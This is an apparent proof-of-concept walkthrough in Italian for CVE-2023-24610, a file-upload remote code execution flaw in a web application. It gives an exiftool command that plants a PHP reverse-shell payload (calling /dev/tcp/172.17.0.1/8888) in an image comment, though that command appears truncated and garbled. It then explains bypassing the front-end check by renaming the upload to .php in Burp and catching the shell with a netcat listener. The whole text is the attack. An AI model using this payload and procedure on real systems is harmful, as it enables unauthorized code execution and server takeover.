
Questa è una prova di concetto per CVE-2023-24610
Questa è una prova di concetto per CVE-2023-24610
Iniziamo creando un file poliglotta usando exiftool: exiftool -Comment="/dev/tcp/172.17.0.1/8888 <&1\''); ?>" avatar.png -o polyglot.php

Cambiamo il file in png in modo che superi il controllo del front-end

Dopo di che, avviamo un listener nc sulla porta 8888 per ricevere la shell.

Il passo successivo è accedere all'applicazione e cliccare su setup

In fondo alla pagina, vediamo un'area per il logo dell'esercitazione. Possiamo caricare un file usando il pulsante modifica sul lato destro

Clicchiamo su modifica e poi su sfoglia, selezioniamo il file ".png" che abbiamo creato al primo passo

Prima di cliccare su carica, ci assicuriamo di intercettare la richiesta con burp o qualcosa di simile. Clicchiamo su carica e in burp cambiamo l'estensione del file da "png" a "php"

Disattiviamo l'intercettazione in modo che il nostro file venga caricato e controlliamo il listener nc che abbiamo avviato prima. Abbiamo una shell inversa e l'IP punta al nostro container docker.
